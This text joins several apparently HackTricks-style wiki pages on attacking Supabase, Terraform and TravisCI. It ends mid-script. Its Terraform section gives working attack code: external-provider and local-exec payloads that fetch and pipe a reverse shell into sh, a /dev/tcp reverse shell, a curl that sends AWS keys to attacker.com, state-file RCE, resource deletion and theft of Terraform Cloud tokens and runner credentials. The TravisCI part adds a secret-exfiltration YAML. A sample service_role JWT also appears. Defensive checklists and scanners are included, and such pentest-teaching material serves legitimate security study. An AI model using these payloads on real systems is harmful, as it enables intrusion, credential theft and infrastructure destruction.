The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
### JWT Secret
A **JWT Secret** will also be generated so the application can **create and sign custom JWT tokens**.
## Authentication
### Signups
> [!TIP]
> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints.
However, these new accounts, by default, **will need to validate their email address** before being able to log into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to log in without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\
This is a very bad idea because Supabase charges per active user, so people could create users and log in, and Supabase would charge for them:
<figure><img src="../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
#### Auth: Server-side signup enforcement
仅在前端隐藏注册按钮并不足够。如果 **Auth server 仍然允许注册**,攻击者可以使用公共的 `anon` key 直接调用 API 并创建任意用户。
Hiding the signup button in the frontend is not enough. If the **Auth server still allows signups**, an attacker can call the API directly with the public `anon` key and create arbitrary users.
Quick test (from an unauthenticated client):
```bash
curl -X POST \
  -H "apikey: <SUPABASE_ANON_KEY>" \
  -H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
  -H "Content-Type: application/json" \
  -d '{"email":"attacker@example.com","password":"Sup3rStr0ng!"}' \
  https://<PROJECT_REF>.supabase.co/auth/v1/signup
```
Expected hardening:
- Disable email/password signups in the Dashboard: Authentication → Providers → Email → Disable sign ups (invite-only), or set the equivalent GoTrue setting.
- Verify the API now returns 4xx to the previous call and no new user is created.
- If you rely on invites or SSO, ensure all other providers are disabled unless explicitly needed.
## RLS and Views: Write bypass via PostgREST
Using a Postgres VIEW to “hide” sensitive columns and exposing it via PostgREST can change how privileges are evaluated. In PostgreSQL:
- Ordinary views execute with the privileges of the view owner by default (definer semantics). In PG ≥15 you can opt into `security_invoker`.
- Row Level Security (RLS) applies on base tables. Table owners bypass RLS unless `FORCE ROW LEVEL SECURITY` is set on the table.
- Updatable views can accept INSERT/UPDATE/DELETE that are then applied to the base table. Without `WITH CHECK OPTION`, writes that don't match the view predicate may still succeed.
Risk pattern observed in the wild:
- A reduced-column view is exposed through Supabase REST and granted to `anon`/`authenticated`.
- PostgREST allows DML on the updatable view and the operation is evaluated with the view owners privileges, effectively bypassing the intended RLS policies on the base table.
- Result: low-privileged clients can mass-edit rows (e.g., profile bios/avatars) they should not be able to modify.
Illustrative write via view (attempted from a public client):
```bash
curl -X PATCH \
  -H "apikey: <SUPABASE_ANON_KEY>" \
  -H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
  -H "Content-Type: application/json" \
  -H "Prefer: return=representation" \
  -d '{"bio":"pwned","avatar_url":"https://i.example/pwn.png"}' \
  "https://<PROJECT_REF>.supabase.co/rest/v1/users_view?id=eq.<victim_user_id>"
```
Hardening checklist for views and RLS:

- Prefer exposing base tables with explicit, least-privilege grants and precise RLS policies.
- If you must expose a view:
  - Make it non-updatable (e.g., include expressions/joins) or deny `INSERT/UPDATE/DELETE` on the view to all untrusted roles.
  - Enforce `ALTER VIEW <v> SET (security_invoker = on)` so the invokers privileges are used instead of the owners.
  - On base tables, use `ALTER TABLE <t> FORCE ROW LEVEL SECURITY;` so even owners are subject to RLS.
  - If allowing writes via an updatable view, add `WITH [LOCAL|CASCADED] CHECK OPTION` and complementary RLS on base tables to ensure only allowed rows can be written/changed.
- In Supabase, avoid granting `anon`/`authenticated` any write privileges on views unless you have verified end-to-end behavior with tests.

Detection tip:

- From `anon` and an `authenticated` test user, attempt all CRUD operations against every exposed table/view. Any successful write where you expected denial indicates a misconfiguration.
### OpenAPI-driven CRUD probing from anon/auth roles
PostgREST exposes an OpenAPI document that you can use to enumerate all REST resources, then automatically probe allowed operations from low-privileged roles.
Fetch the OpenAPI (works with the public anon key):
```bash
curl -s https://<PROJECT_REF>.supabase.co/rest/v1/ \
  -H "apikey: <SUPABASE_ANON_KEY>" \
  -H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
  -H "Accept: application/openapi+json" | jq '.paths | keys[]'
```
Probe pattern (examples):
- Read a single row (expect 401/403/200 depending on RLS):
```bash
curl -s "https://<PROJECT_REF>.supabase.co/rest/v1/<table>?select=*&limit=1" \
  -H "apikey: <SUPABASE_ANON_KEY>" \
  -H "Authorization: Bearer <SUPABASE_ANON_KEY>"
```
- Test UPDATE is blocked (use a non-existing filter to avoid altering data during testing):
```bash
curl -i -X PATCH \
  -H "apikey: <SUPABASE_ANON_KEY>" \
  -H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
  -H "Content-Type: application/json" \
  -H "Prefer: return=minimal" \
  -d '{"__probe":true}' \
  "https://<PROJECT_REF>.supabase.co/rest/v1/<table_or_view>?id=eq.00000000-0000-0000-0000-000000000000"
```
- Test INSERT is blocked:
```bash
curl -i -X POST \
  -H "apikey: <SUPABASE_ANON_KEY>" \
  -H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
  -H "Content-Type: application/json" \
  -H "Prefer: return=minimal" \
  -d '{"__probe":true}' \
  "https://<PROJECT_REF>.supabase.co/rest/v1/<table_or_view>"
```
- Test DELETE is blocked:
```bash
curl -i -X DELETE \
  -H "apikey: <SUPABASE_ANON_KEY>" \
  -H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
  "https://<PROJECT_REF>.supabase.co/rest/v1/<table_or_view>?id=eq.00000000-0000-0000-0000-000000000000"
```
Recommendations:
- Automate the previous probes for both `anon` and a minimally `authenticated` user and integrate them in CI to catch regressions.
- Treat every exposed table/view/function as a first-class surface. Don't assume a view "inherits" the same RLS posture as its base tables.
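The automation suggested above can be sketched as two small helpers (PROJECT_REF and SUPABASE_ANON_KEY are placeholders; `jq` and `curl` are assumed available):

```shell
#!/bin/sh
# Extract table/view names from a PostgREST OpenAPI document read on stdin.
list_resources() {
  jq -r '.paths | keys[] | ltrimstr("/") | select(length > 0)'
}

# Return the HTTP status of a harmless write probe against one resource.
probe_write() {
  curl -s -o /dev/null -w '%{http_code}' -X PATCH \
    -H "apikey: $SUPABASE_ANON_KEY" \
    -H "Authorization: Bearer $SUPABASE_ANON_KEY" \
    -H "Content-Type: application/json" -d '{"__probe":true}' \
    "https://$PROJECT_REF.supabase.co/rest/v1/$1?id=eq.00000000-0000-0000-0000-000000000000"
}

# Usage (repeat for anon and for a low-privileged authenticated token):
# curl -s "https://$PROJECT_REF.supabase.co/rest/v1/" \
#   -H "apikey: $SUPABASE_ANON_KEY" -H "Accept: application/openapi+json" \
#   | list_resources | while read -r t; do
#       echo "$t PATCH -> $(probe_write "$t")"   # anything but 4xx is suspicious
#     done
```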
### Passwords & sessions
It's possible to indicate the minimum password length, the password requirements (none by default) and to disallow the use of leaked passwords.\
It's recommended to **improve the requirements as the default ones are weak**.
- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...)
- Bot and Abuse Protection: It's possible to enable Captcha.
### SMTP Settings
It's possible to set up an SMTP server to send emails.
### Advanced Settings
- Set the expiration time of access tokens (3600 by default)
- Set to detect and revoke potentially compromised refresh tokens, and their timeout
- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default)
- Max Direct Database Connections: Max number of connections used for auth (10 by default)
- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default)
## Storage
> [!TIP]
> Supabase allows **to store files** and make them accessible over a URL (it uses S3 buckets).
- Set the upload file size limit (default is 50MB)
- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
- It's possible to **request S3 access keys**, which are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
## Edge Functions
It's also possible to **store secrets** in Supabase which will be **accessible by edge functions** (they can be created and deleted from the web, but it's not possible to access their value directly).
## References
- [Building Hacker Communities: Bug Bounty Village, getDiscloseds Supabase Misconfig, and the LHE Squad (Ep. 133) YouTube](https://youtu.be/NI-eXMlXma4)
- [Critical Thinking Podcast Episode 133 page](https://www.criticalthinkingpodcast.io/episode-133-building-hacker-communities-bug-bounty-village-getdisclosed-and-the-lhe-squad/)


{{#include ../banners/hacktricks-training.md}}
## Basic Information
[From the docs:](https://developer.hashicorp.com/terraform/intro)
HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
#### How does Terraform work?
Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API.
![](<../images/image (177).png>)
HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more.
The core Terraform workflow consists of three stages:
- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer.
- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration.
- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines.
![](<../images/image (215).png>)
### Terraform Lab
Just install terraform in your computer.
Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads).
Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files** or to **be able to modify the terraform state file** (see chapter below).
然而,terraform 是一个被入侵后 **非常敏感的组件**,因为它需要对不同的位置拥有 **privileged access** 才能正常工作。
However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly.
The main way for an attacker to compromise the system where terraform is running is to **compromise the repository that stores the terraform configurations**, because at some point they are going to be **interpreted/executed**.
Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**:
{{#ref}}
atlantis-security.md
{{#endref}}
If you are able to compromise a terraform file, there are different ways you can achieve RCE when someone executes `terraform plan` or `terraform apply`.
### Terraform plan
Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands during a `terraform plan`.
**Using an external provider**
Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`.
Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`:
```javascript
data "external" "example" {
  program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
**Using a custom provider**
An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)):
```javascript
terraform {
  required_providers {
    evil = {
      source = "evil/evil"
      version = "1.0"
    }
  }
}

provider "evil" {}
```
The provider is downloaded during `init` and will run the malicious code when `plan` is executed.
You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
**Using an external reference**
Both mentioned options are useful but not very stealthy (the second is stealthier but also more complex than the first one). You can perform this attack in an even **stealthier way** by following these suggestions:
- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
```hcl
module "not_rev_shell" {
  source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
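Putting both suggestions together, the module block would look something like the following (the repo path and the `b401d2b` ref come from the example above; in a real attack they would point at your own repo and commit):

```hcl
module "not_rev_shell" {
  # The ?ref= pins a branch/commit, so the payload never shows up in the default branch
  source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b"
}
```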
### Terraform Apply
Terraform apply will be executed to apply all the changes, and you can also abuse it to obtain RCE by injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
You just need to make sure some payload like the following ones ends up in the `main.tf` file:
```hcl
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
}
```
Follow the **suggestions from the previous technique** to perform this attack in a **stealthier way using external references**.
## Secrets Dumps
You can get **secret values used by terraform dumped** when running `terraform apply` by adding something like the following to the terraform file:
```hcl
output "dotoken" {
  value = nonsensitive(var.do_token)
}
```
## Abusing Terraform State Files
In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file. Even if you would have write access over the config files, using the vector of state files is often way more sneaky, since you do not leave tracks in the `git` history.
It is possible to [create a custom provider](https://developer.hashicorp.com/terraform/plugin) that runs arbitrary code when Terraform reads its resources from the state file.
The provider [statefile-rce](https://registry.terraform.io/providers/offensive-actions/statefile-rce/latest) builds on the research and weaponizes this principle. You can add a fake resource and state the arbitrary bash command you want to run in the attribute `command`. When the `terraform` run is triggered, this will be read and executed in both the `terraform plan` and `terraform apply` steps. In case of the `terraform apply` step, `terraform` will delete the fake resource from the state file after executing your command, cleaning up after itself. More information and a full demo can be found in the [GitHub repository hosting the source code for this provider](https://github.com/offensive-actions/terraform-provider-statefile-rce).
To use it directly, just include the following at any position of the `resources` array and customize the `name` and the `command` attributes:
```json
{
"mode": "managed",
"type": "rce",
"name": "<arbitrary_name>",
"provider": "provider[\"registry.terraform.io/offensive-actions/statefile-rce\"]",
"instances": [
{
"schema_version": 0,
"attributes": {
"command": "<arbitrary_command>",
"id": "rce"
},
"sensitive_attributes": [],
"private": "bnVsbA=="
}
]
}
```
Then, as soon as `terraform` gets executed, your code will run.
### Deleting resources <a href="#deleting-resources" id="deleting-resources"></a>
There are 2 ways to destroy resources:
1. **Insert a resource with a random name into the state file pointing to the real resource to destroy**
Because terraform will see that the resource shouldn't exist, it'll destroy it (following the real resource ID indicated). Example from the previous page:
```json
{
"mode": "managed",
"type": "aws_instance",
"name": "example",
"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
"instances": [
{
"attributes": {
"id": "i-1234567890abcdefg"
}
}
]
},
```
2. **Modify the resource to delete in a way that it's not possible to update it (so it'll be deleted and recreated)**
For an EC2 instance, modifying the type of the instance is enough to make terraform delete and recreate it.
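As a hedged sketch of this idea (the instance ID is the placeholder from above): tampering with an attribute in the state entry so it no longer matches the configuration, picking one whose change forces replacement such as `ami`, makes the next apply destroy and recreate the instance:

```json
{
  "attributes": {
    "id": "i-1234567890abcdefg",
    "ami": "ami-00000000000000000"
  }
}
```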
### Replace blacklisted provider
In case you encounter a situation where `hashicorp/external` is blacklisted, you can re-implement the `external` provider as follows. Note: we use a fork of the external provider published at https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well.
```terraform
terraform {
required_providers {
external = {
source = "nazarewk/external"
version = "3.0.0"
}
}
}
```
Then you can use `external` as per normal.
```terraform
data "external" "example" {
program = ["sh", "-c", "whoami"]
}
```
## Terraform Cloud speculative plan RCE and credential exfiltration
This scenario abuses Terraform Cloud (TFC) runners during speculative plans to pivot into the target cloud account.
- Preconditions:
- Steal a Terraform Cloud token from a developer machine. The CLI stores tokens in plaintext at `~/.terraform.d/credentials.tfrc.json`.
- The token must have access to the target organization/workspace and at least the `plan` permission. VCS-backed workspaces block `apply` from CLI, but still allow speculative plans.
- Discover workspace and VCS settings via the TFC API:
```bash
export TF_TOKEN=<stolen_token>
curl -s -H "Authorization: Bearer $TF_TOKEN" \
https://app.terraform.io/api/v2/organizations/<org>/workspaces/<workspace> | jq
```
- Trigger code execution during a speculative plan using the external data source and the Terraform Cloud "cloud" block to target the VCS-backed workspace:
```hcl
terraform {
cloud {
organization = "acmecorp"
workspaces { name = "gcp-infra-prod" }
}
}
data "external" "exec" {
program = ["bash", "./rsync.sh"]
}
```
Example rsync.sh to obtain a reverse shell on the TFC runner:
```bash
#!/usr/bin/env bash
bash -c 'exec bash -i >& /dev/tcp/attacker.com/19863 0>&1'
```
Run a speculative plan to execute the program on the ephemeral runner:
```bash
terraform init
terraform plan
```
- Enumerate and exfiltrate injected cloud credentials from the runner. During runs, TFC injects provider credentials via files and environment variables:
```bash
env | grep -i gcp || true
env | grep -i aws || true
```
Expected files on the runner working directory:
- GCP:
- `tfc-google-application-credentials` (Workload Identity Federation JSON config)
- `tfc-gcp-token` (short-lived GCP access token)
- AWS:
- `tfc-aws-shared-config` (web identity/OIDC role assumption config)
- `tfc-aws-token` (short-lived token; some orgs may use static keys)
- Use the short-lived credentials out-of-band to bypass VCS gates:
GCP (gcloud):
```bash
export GOOGLE_APPLICATION_CREDENTIALS=./tfc-google-application-credentials
gcloud auth login --cred-file="$GOOGLE_APPLICATION_CREDENTIALS"
gcloud config set project <PROJECT_ID>
```
AWS (AWS CLI):
```bash
export AWS_CONFIG_FILE=./tfc-aws-shared-config
export AWS_PROFILE=default
aws sts get-caller-identity
```
With these creds, attackers can create/modify/destroy resources directly using native CLIs, sidestepping PR-based workflows that block `apply` via VCS.
- Defensive guidance:
- Apply least privilege to TFC users/teams and tokens. Audit memberships and avoid oversized owners.
- Restrict `plan` permission on sensitive VCS-backed workspaces where feasible.
- Enforce provider/data source allowlists with Sentinel policies to block `data "external"` or unknown providers. See HashiCorp guidance on provider filtering.
- Prefer OIDC/WIF over static cloud credentials; treat runners as sensitive. Monitor speculative plan runs and unexpected egress.
- Detect exfiltration of `tfc-*` credential artifacts and alert on suspicious `external` program usage during plans.
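For the allowlist idea above, a minimal Sentinel policy sketch (assuming the `tfplan/v2` import; attribute names should be checked against current Sentinel docs) could deny any plan that uses the `external` data source:

```
import "tfplan/v2" as tfplan

# Collect every planned use of the external data source
external_usage = filter tfplan.resource_changes as _, rc {
    rc.mode is "data" and rc.type is "external"
}

main = rule { length(external_usage) is 0 }
```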
## Compromising Terraform Cloud
### Using a token
As **[explained in this post](https://www.pentestpartners.com/security-blog/terraform-token-abuse-speculative-plan/)**, the terraform CLI stores tokens in plaintext at **`~/.terraform.d/credentials.tfrc.json`**. Stealing this token lets an attacker impersonate the user within the token's scope.
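The credentials file is plain JSON, so pulling the token out is a one-liner. The following offline sketch fabricates a fake copy of the file (with a made-up token) just to show the extraction; on a real victim machine you would point it at `~/.terraform.d/credentials.tfrc.json`:

```shell
# Offline demo: fabricate the credentials file `terraform login` would write
CRED_FILE=$(mktemp)
cat > "$CRED_FILE" <<'EOF'
{
  "credentials": {
    "app.terraform.io": {
      "token": "atlasv1.FAKE_TOKEN_VALUE"
    }
  }
}
EOF
# On a real host: CRED_FILE="$HOME/.terraform.d/credentials.tfrc.json"
TF_TOKEN=$(sed -n 's/.*"token": *"\([^"]*\)".*/\1/p' "$CRED_FILE")
echo "$TF_TOKEN"
rm -f "$CRED_FILE"
```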
Using this token it's possible to get the org/workspace with:
```bash
GET https://app.terraform.io/api/v2/organizations/acmecorp/workspaces/gcp-infra-prod
Authorization: Bearer <TF_TOKEN>
```
Then it's possible to run arbitrary code using **`terraform plan`** as explained in the previous chapter.
### Escaping to the cloud
Then, if the runner is located in some cloud environment, it's possible to obtain a token of the principal attached to the runner and use it out of band.
- **GCP files (present in current run working directory)**
- `tfc-google-application-credentials` — JSON config for Workload Identity Federation (WIF) that tells Google how to exchange the external identity.
- `tfc-gcp-token` — short-lived (≈1 hour) GCP access token referenced by the above.
- **AWS files**
- `tfc-aws-shared-config` — JSON for web identity federation/OIDC role assumption (preferred over static keys).
- `tfc-aws-token` — short-lived token, or potentially static IAM keys if misconfigured.
## Automatic Audit Tools
### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats.
- **Features:**
- Real-time scanning for security vulnerabilities and compliance issues.
- Integration with version control systems (GitHub, GitLab, Bitbucket).
- Automated fix pull requests.
- Detailed remediation advice.
- **Sign Up:** Create an account on [Snyk](https://snyk.io/).
```bash
brew tap snyk/tap
brew install snyk
snyk auth
snyk iac test /path/to/terraform/code
```
### [Checkov](https://github.com/bridgecrewio/checkov) <a href="#install-checkov-from-pypi" id="install-checkov-from-pypi"></a>
**Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages.
It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), or [OpenTofu](https://opentofu.org/) and detects security and compliance misconfigurations using graph-based scanning.
It performs [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs).
```bash
pip install checkov
checkov -d /path/to/folder
```
### [terraform-compliance](https://github.com/terraform-compliance/cli)
From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
- **compliance:** Ensure the implemented code is following security standards, your own custom standards
- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ?
- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/)
- **pre-deploy:** it validates your code before it is deployed
- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated.
- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible.
> [!NOTE]
> Unfortunately, if the code uses some providers you don't have access to, you won't be able to perform the `terraform plan` and run this tool.
```bash
pip install terraform-compliance
terraform plan -out=plan.out
terraform-compliance -f /path/to/folder -p plan.out
```
### [tfsec](https://github.com/aquasecurity/tfsec)
From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations.
- ☁️ Checks for misconfigurations across all major (and some minor) cloud providers
- ⛔ Hundreds of built-in rules
- 🪆 Scans modules (local and remote)
- Evaluates HCL expressions as well as literal values
- ↪️ Evaluates Terraform functions e.g. `concat()`
- 🔗 Evaluates relationships between Terraform resources
- 🧰 Compatible with the Terraform CDK
- 🙅 Applies (and embellishes) user-defined Rego policies
- 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif.
- 🛠️ Configurable (via CLI flags and/or config file)
- ⚡ Very fast, capable of quickly scanning huge repositories
```bash
brew install tfsec
tfsec /path/to/folder
```
### [KICS](https://github.com/Checkmarx/kics)
Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with **KICS** by Checkmarx.
**KICS** stands for **K**eeping **I**nfrastructure as **C**ode **S**ecure, it is open source and is a must-have for any cloud native project.
```bash
docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"
```
### [Terrascan](https://github.com/tenable/terrascan)
From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to:
- Seamlessly scan infrastructure as code for misconfigurations.
- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture.
- Detect security vulnerabilities and compliance violations.
- Mitigate risks before provisioning cloud native infrastructure.
- Offers flexibility to run locally or integrate with your CI\CD.
```bash
brew install terrascan
terrascan scan -d /path/to/folder
```
## References
- [Atlantis Security](atlantis-security.md)
- [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
- [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
- [https://github.com/offensive-actions/terraform-provider-statefile-rce](https://github.com/offensive-actions/terraform-provider-statefile-rce)
- [Terraform Cloud token abuse turns speculative plan into remote code execution](https://www.pentestpartners.com/security-blog/terraform-token-abuse-speculative-plan/)
- [Terraform Cloud permissions](https://developer.hashicorp.com/terraform/cloud-docs/users-teams-organizations/permissions)
- [Terraform Cloud API Show workspace](https://developer.hashicorp.com/terraform/cloud-docs/api-docs/workspaces#show-workspace)
- [AWS provider configuration](https://registry.terraform.io/providers/hashicorp/aws/latest/docs#provider-configuration)
- [AWS CLI OIDC role assumption](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html#cli-configure-role-oidc)
- [GCP provider Using Terraform Cloud](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference.html#using-terraform-cloud)
- [Terraform Sensitive variables](https://developer.hashicorp.com/terraform/tutorials/configuration-language/sensitive-variables)
- [Snyk Labs Gitflops: dangers of Terraform automation platforms](https://labs.snyk.io/resources/gitflops-dangers-of-terraform-automation-platforms/)
{{#include ../banners/hacktricks-training.md}}

{{#include ../banners/hacktricks-training.md}}
Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective
- Drone
- TeamCity
- Rancher
- Mesosphere
- Radicle
- Any other CI/CD platform...
{{#include ../banners/hacktricks-training.md}}

# TravisCI Security
{{#include ../../banners/hacktricks-training.md}}
## What is TravisCI
**Travis CI** is a **hosted** or **on-premises** **continuous integration** service used to build and test software projects hosted on several **different git platforms**.
{{#ref}}
basic-travisci-information.md
{{#endref}}
## Attacks
### Triggers
To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**:
![](<../../images/image (145).png>)
#### Cron Jobs
If you have access to the web application you can **set crons to run the build**, which could be useful for persistence or to trigger a build:
![](<../../images/image (243).png>)
> [!NOTE]
> It looks like it's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162).
### Third Party PR
TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
![](<../../images/image (208).png>)
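As a hedged sketch (the exfil endpoint is a placeholder, and this only pays off when the project has opted in to sharing secret env variables with fork PRs), the PR's `.travis.yml` could simply ship the build environment out:

```yaml
language: minimal
script:
  # Base64 the env so Travis' log masking of exact secret values doesn't trigger
  - curl -s -X POST --data "$(env | base64 | tr -d '\n')" https://attacker.example/exfil
```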
### Dumping Secrets
As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets: **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both are stored encrypted and will end up as env variables in the final machines).
- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build.
- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**.
- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as:
![](<../../images/image (81).png>)
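The hunt for those artifacts can be scripted. The following offline sketch plants a repo layout like the one described (the `encrypted_355e94ba1091_*` names come from the example line above) and then greps for the telltale traces:

```shell
# Offline demo: fake a repo containing Travis encrypted-file artifacts
REPO=$(mktemp -d)
printf '%s\n' 'before_install:' \
  '- openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d' \
  > "$REPO/.travis.yml"
touch "$REPO/super_secret.txt.enc"

# Telltale env var names referenced from the config
KEYS=$(grep -rEho 'encrypted_[0-9a-f]+_(key|iv)' "$REPO" | sort -u)
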